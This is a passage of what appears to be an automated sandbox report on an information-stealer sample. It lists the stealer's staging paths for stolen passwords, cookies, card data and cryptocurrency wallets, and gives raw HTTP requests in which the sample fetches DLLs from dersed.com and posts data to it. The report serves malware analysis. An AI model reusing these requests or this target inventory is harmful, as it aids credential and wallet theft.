- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DCEB3BF5-151E-4025-A595-D330A9AC667A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708\\data"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dersed.com",
- "answers":
- "data": "104.200.67.209",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "104.200.67.209",
- "domain": "dersed.com"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://dersed.com/288",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/288",
- "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40398\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "72.11.140.50",
- "inaddrarpa": "",
- "hostname": "ip-api.com"
- "country_name": "United States",
- "ip": "104.200.67.209",
- "inaddrarpa": "",
- "hostname": "dersed.com"
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement